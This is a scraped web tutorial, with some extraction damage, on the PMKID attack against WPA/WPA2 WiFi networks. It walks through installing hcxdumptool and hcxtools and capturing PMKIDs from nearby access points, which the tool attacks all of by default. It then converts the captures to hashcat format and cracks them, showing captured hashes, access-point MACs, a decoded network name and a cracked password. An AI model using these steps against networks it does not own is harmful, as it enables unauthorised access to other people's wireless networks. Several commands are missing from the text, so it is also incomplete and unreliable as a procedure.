Professional Documents
Culture Documents
Kalitut Com Pmkid Attack
Kalitut Com Pmkid Attack
Kalitut Com Pmkid Attack
There are a large number of various attacks on WiFi . The most universal
attack (working against virtually all access points) is an attack on WPA/WPA2
technology, since it is used in the vast majority of wireless access points.
WPA/WPA2, when clients connect to an access point, use the EAPOL security
protocol, during which there is a gradual exchange of data between the
access point and the client that wants to connect. The essence of the attack
lies in the fact that it is necessary to intercept the entire (or at least a part) of
the transmitted data and use the search method to nd a suitable password.
Simply put, you rst need to grab a handshake (at the EAPOL stage), and then
use brute-force to nd the correct password.
At each of these two stages, di culties may arise: problems with the seizure
of a handshake can be caused by many reasons, the most fatal of them being
the lack of clients. That is if there are no connecting clients, then the EAPOL
protocol is not used, which means there is nothing to intercept.
The main difference from the existing attacks is that in this attack a full 4-
way handshake EAPOL is not required. A new attack is performed in the RSN
IE (Robust Security Network Information Element), and for its successful
replay a single EAPOL frame is enough.
Currently, it is not known for how many routers this method will work – most
likely, for all existing 802.11i / p / q / r networks with roaming features
enabled, which is the majority of modern routers.
Next, some theoretical information from the forum, and then an example of a
real successful attack on this technology.
This attack was discovered by chance while searching for new ways to attack
the future security standard WPA3. This WPA3 will be much harder to attack
because of the modern key-setting protocol called “Simultaneous
Authentication of Equals” (SAE).
It is not reported whether a new attack on WPA3 was found, but a new attack
was opened for WPA / WPA2 PSK, and the necessary tools have already been
prepared. The main difference from the existing attacks is that the new
method does not require a full capture of the 4-stage EAPOL handshake. A
new attack is performed on the RSN IE (Robust Security Network Information
Element) single-frame EAPOL.
So far not enough information has been gathered to say exactly for which
manufacturers or for which routers this technique will work, but the authors
believe that it will work with respect to any 802.11i / p / q / r networks with
roaming features enabled (most modern routers ).
In this list:
And there is also 802.11q in the list – this standard is not used, the
designation is reserved, the authors added it to this list for joke – to look at
those who reprint materials without checking anything at all.
And further:
And note that we receive all the data we need in the EAPOL FIRST frame,
which the Access Points Tools to attack wi without clients in Kali Linux
Three tools are needed for this attack:
# install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install
cd .. # up
# install hcxtools
sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-de
git clone https://github.com/ZerBea/hcxtools
cd hcxtools /
make
sudo make install
cd ..
Kali hashcat is installed by default,
Example of a “no client” attack on WiFi
Let’s start with the following command:
sudo hcxdumptool -I
In theory, you do not need to transfer the WiFi card to monitor mode –
hcxdumptool should do it for us, but if you get this messages:
interface is not up
failed to init socket
then switch the wireless interface to monitor mode manually with commands
like:
For example, I want to use the wlan0 interface , then my commands look like
this:
As already mentioned, all Access Points are attacked by default, if you want
to attack only some or only one, then use the option – lterlist = < le> , where
as < le> specify the list of MAC addresses (one per line) . By default, these
targets will NOT be attacked. If you want to attack ONLY the target from the
list, use the option – ltermode = 2 .
If you want to attack a speci c access point and you know the channel
number on which it works, then in addition to the – lterlist options (in which
specify one address) and the options – ltermode = 2 , you can specify the -c
option , after which write the channel number AP
Additionally, from time to time, summarizing data will appear below, including
those containing the string powned , for example, powned = 6 :
This means that data is captured for six (in my case) access points. This is
not necessarily PMKID — regular handshakes are also taken into account
(unless the deauthentication attack was previously disabled).
Depending on the noise of the wi channel, it may take some time to get
PMKID. The authors recommend running hcxdumptool for up to 10 minutes.
Data collection can work any time, usually 10 minutes is more than enough.
To stop capturing, just press Ctrl + c .
Now, run hcxpcaptool to convert captured data from pcapng format to hash
format that hashcat accepts:
hcxpcaptool -z test.16800 test.pcapng
Here:
gedit test.16800
Content of my le:
f2d89d22949759168edf5fd0324764a7*cc4eece1ad58*008092b75244
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d
a695c4e6a51c1590ea06a458a1860a24*403dec1a88a8*a8880854af50
8a8e906b2fb33e0c66833e5efeb4dc8e*403dec187630*7429afe41473
bba899c7bd8719487377dd38a83a2648*403decc272b8*bc926b7c4e2c
5a2da74a1dbe085331dcd9af61a87f50*c88d833bea34*18e29fec7be3
e33c525441bf7588c53966addb685a4c*98ded0be2346*fcc2333f478f
67661236088d31c937a4646ede4aa7bb*403decbeb114*fcc2333f478f
1bdb53c369ca8c470d9cc990440f056f*2c088c5a4862*60a4d0044de7
It seems that nothing is clear? In fact, everything is quite simple. The most
interesting part of the hash for us is the line that comes after the last
asterisk. It contains the name of the Access Point in hexadecimal. To
translate this name into a normal form, use a command like this:
Result:
PURE FURNITURE
To show the names of all access points for which data is captured, use the
command:
awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }'
PMKID
MAC AP
MAC Stations
Essid
This is not required, but with hcxpcaptool you can also try options such as -E -I
and -U :
These les can be used for dictionary attacks with hashcat. Usually they give
a good result.
command along with these options:
These options are searched for any text strings in clear text. As I said at the
beginning, manufacturers’ WiFi implementations are different, in some
sensitive data can be transmitted in the clear.
There may be new essidlist les (mostly consisting of Access Point names,
but there may be other very interesting lines), identitylist and usernamelist.
Some les may not appear if nothing is found.
Now go to brute-force.
You can search for passwords by mask or by dictionary. You can attack as all
the hashes in the le, and individual.
For example, if I want to attack all hashes with a dictionary attack, then my
command is as follows:
In it:
If you want to crack only individual hashes, then in the previous command,
instead of the path to the le with the hashes, specify the hash itself, putting
it in quotes. For example, I want to crack the
hash b3304420b5100873aa23ee3fc2ab3244 * d8fb5e49f484 * 9c04ebaaa33d * 5055524520465552
then my command:
In it:
fa9a5dd2fb9029bfc9f4d1bd4e384bfb*403decc272b8*7081eb739a56
That is, this is the original hash, after which a clear-ended password is added
after the colon. In this case, the password is 00001777, in order to decode the
name of the access point we use the already familiar construction:
Attack results:
The rst dictionary attack failed. But the second attack on the mask cracked 2
of 9 passwords.
Conclusion
The considered attack is a great addition to the existing ones. Using it, there
is a real chance to get a password from completely “hopeless” Access Points
(without clients and with WPS turned off).
Share this:
Twitter Facebook
Related Posts:
Hacking
Hacking Wi
Wi How
How To
To Create
Create
using
using PMKID
PMKID and
and WiFi
WiFi WPS
WPS Attack
Attack Fake
Fake WiFi
WiFi AP
AP
Aircrack-ng
Aircrack-ng using
using Reaver
Reaver using
using Fluxion
Fluxion 55
WiFi
WiFi Pumpkin
Pumpkin
How
How to
to crack
crack aa Framework
Framework for
for
wi
wi password
password Rogue
Rogue WiFi
WiFi WiFite2
WiFite2
using
using aircrack
aircrack &
& Access
Access Point
Point Automated
Automated WiFi
WiFi
kali
kali Linux
Linux Attack
Attack hacking
hacking tool
tool
Leave a Reply
Your email address will not be published. Required elds are marked *
Comment
Name *
Email *
Website
Save my name, email, and website in this browser for the next time I
comment.
POST COMMENT
Search this website
CATEGORIES
Android pentesting tools
Arduino
Books
Darknet
General
Kali Linux
Linux
Linux Commands
Network Administrator
Penetration Testing
Raspberry Pi
Review
Termux
Tutorials
Ubuntu
Uncategorized
Video Tutorials
vmware
WiFi Adapter
WiFi Pentesting
Wireless Router
Wireshark
RECENT POSTS
Zsh vs Bash: features and differences
Alfa AWUS036H USB WiFi adapter, supports Monitor mode AWUS036H operates in the 2.4GHz
frequency range, with 802.11b/g communication standards
HOME
ABO UT US
PR I VACY PO L I CY
A F F I L I AT E D I S C L A I M E R